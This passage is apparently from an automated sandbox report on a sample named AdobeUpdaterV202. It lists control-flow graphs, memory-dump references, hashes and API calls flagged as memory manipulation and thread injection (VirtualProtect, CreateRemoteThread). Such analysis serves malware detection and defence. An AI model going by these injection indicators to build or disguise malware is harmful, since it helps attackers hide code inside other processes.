                                                                                                                                              control_flow_graph 23 1590a31-1590a64 24 1590a6a-1590a6f 23->24 25 1590c65-1590c6c 23->25 26 1590aab-1590ab0 24->26 27 1590a71-1590a84 24->27 31 1590ab7-1590abc 26->31 27->26 28 1590a86-1590a99 27->28 28->26 29 1590a9b-1590aa9 28->29 29->31 32 1590c6d-1590c7c 31->32 33 1590ac2-1590ad5 31->33 37 1590c7e-1590c93 32->37 38 1590c96-1590cd2 32->38 33->32 34 1590adb-1590aec 33->34 34->32 36 1590af2-1590b10 34->36 41 1590b17-1590b32 36->41 37->38 44 1590cd5-1590d0c 38->44 41->32 47 1590b38-1590b77 41->47 53 1590d12-1590d2f 44->53 54 1590f34-1590fd6 VirtualProtect 44->54 47->32 61 1590b7d-1590bbc 47->61 53->54 59 1590d35-1590d53 53->59 62 1590fd8-1590fde 54->62 63 1590fdf-1591000 54->63 59->44 66 1590d55-1590d5d 59->66 61->32 81 1590bc2-1590bd2 61->81 62->63 69 1590d60-1590d67 66->69 70 1590d69-1590d70 69->70 71 1590daf-1590db8 69->71 70->71 74 1590d72-1590d7e 70->74 71->54 72 1590dbe-1590dce 71->72 72->54 75 1590dd4-1590de2 72->75 74->54 76 1590d84-1590d8e 74->76 75->54 77 1590de8-1590df5 75->77 76->54 79 1590d94-1590da3 76->79 77->54 80 1590dfb-1590e0b 77->80 82 1590dac 79->82 83 1590da5-1590dab 79->83 80->69 84 1590e11-1590e19 80->84 81->32 85 1590bd8-1590be8 81->85 82->71 83->82 86 1590e1c-1590e28 84->86 85->32 87 1590bee-1590bff 85->87 88 1590f1d-1590f24 86->88 89 1590e2e-1590e37 86->89 87->32 90 1590c01-1590c12 87->90 88->86 91 1590f2a-1590f31 88->91 92 1590e39-1590e3f 89->92 93 1590e40-1590e4f 89->93 90->32 94 1590c14-1590c27 90->94 92->93 93->54 95 1590e55-1590e61 93->95 94->32 96 1590c29-1590c3a 94->96 97 1590e6a-1590e85 95->97 98 1590e63-1590e69 95->98 96->32 99 1590c3c-1590c4d 96->99 97->54 102 1590e8b-1590e99 97->102 98->97 99->32 101 1590c4f-1590c5f 99->101 101->24 101->25 102->54 103 1590e9f-1590eac 102->103 103->54 104 1590eb2-1590ec2 103->104 104->54 105 1590ec4-1590edc 104->105 106 1590ede-1590ee5 105->106 107 1590ee6-1590ef1 105->107 106->107 107->54 108 1590ef3-1590f00 107->108 108->54 109 1590f02-1590f17 108->109 109->88 109->89
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2055087637.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_1590000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                              • Opcode ID: 3799603b921bc716e7eeeb6004ad3be49367a1e78a84f205e4819beca77e1c83
                                                                                                                                              • Instruction ID: 6d48939197543453764c7e09bb71b8b65e7a7772bbd2261fdb9b688cbdd57978
                                                                                                                                              • Opcode Fuzzy Hash: 3799603b921bc716e7eeeb6004ad3be49367a1e78a84f205e4819beca77e1c83
                                                                                                                                              • Instruction Fuzzy Hash: 56128C319002558FCB06CF69C480AADFBF6BF49310F59C599E458AB292C734FD81CBA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 015904DF Relevance: 1.6, APIs: 1, Instructions: 71memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 110 15904df-1590fd6 VirtualProtect 114 1590fd8-1590fde 110->114 115 1590fdf-1591000 110->115 114->115
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(04353584,?,?,?), ref: 01590FC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2055087637.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_1590000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 598a1a21eaa06c81a61052d9643748b3ea92867a1a0b0a4a60e8a97af6e0724d
                                                                                                                                              • Instruction ID: 84842b6a4549aaf4d868cf1f97454e84c4d3628a1de5f9f997d82a9067390297
                                                                                                                                              • Opcode Fuzzy Hash: 598a1a21eaa06c81a61052d9643748b3ea92867a1a0b0a4a60e8a97af6e0724d
                                                                                                                                              • Instruction Fuzzy Hash: 7D216B718052599FCB00DF99C884ADEFBF8FF09320F10856AE958A7251D378A945CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 01591011 Relevance: 1.6, APIs: 1, Instructions: 70threadinjectionCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 117 1591011-1591072 119 1591082-15910c1 CreateRemoteThread 117->119 120 1591074-1591080 117->120 121 15910ca-15910de 119->121 122 15910c3-15910c9 119->122 120->119 122->121
                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 015910B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2055087637.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_1590000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: 06112d690ceca2f481c6546f422c39bef72977cb5c7e6aca456956c79114cae4
                                                                                                                                              • Instruction ID: f3d076fcd50077304ba39944f38606808e3336d654f793c10b8f1c11054aacd1
                                                                                                                                              • Opcode Fuzzy Hash: 06112d690ceca2f481c6546f422c39bef72977cb5c7e6aca456956c79114cae4
                                                                                                                                              • Instruction Fuzzy Hash: 9331E2B5900249DFCF10CF99D984ADEBFF5FB48320F20842AE959A7250D375A950CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 01590500 Relevance: 1.6, APIs: 1, Instructions: 69threadinjectionCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 124 1590500-1591072 127 1591082-15910c1 CreateRemoteThread 124->127 128 1591074-1591080 124->128 129 15910ca-15910de 127->129 130 15910c3-15910c9 127->130 128->127 130->129
                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 015910B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2055087637.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_1590000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: 06c7d39843a6cb5cbbcdf7305366ff435204e113f3c76fb8bbaa1dc330002df6
                                                                                                                                              • Instruction ID: 95687089acbfbb44161efc2ca266262d1887992f7b78fd91db567f6b8b5fd16a
                                                                                                                                              • Opcode Fuzzy Hash: 06c7d39843a6cb5cbbcdf7305366ff435204e113f3c76fb8bbaa1dc330002df6
                                                                                                                                              • Instruction Fuzzy Hash: C93113B1A00249DFCF10CF99D984ADEBBF4FB48310F10842AE958A7350D375A950CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 015904F4 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 132 15904f4-1590fd6 VirtualProtect 135 1590fd8-1590fde 132->135 136 1590fdf-1591000 132->136 135->136
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(04353584,?,?,?), ref: 01590FC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2055087637.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_1590000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 8f41137edadbc733861e05b751ba46a464ca95672d8b874cf610dca64a071345
                                                                                                                                              • Instruction ID: 02fc4981f22be5d394722206cd27487a514b3d924fe4c58e17ea39eb7716ff21
                                                                                                                                              • Opcode Fuzzy Hash: 8f41137edadbc733861e05b751ba46a464ca95672d8b874cf610dca64a071345
                                                                                                                                              • Instruction Fuzzy Hash: C921E8B59012199FCB00DF99C885BDEFBF8FB09320F10852AE958A7250D374A954CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%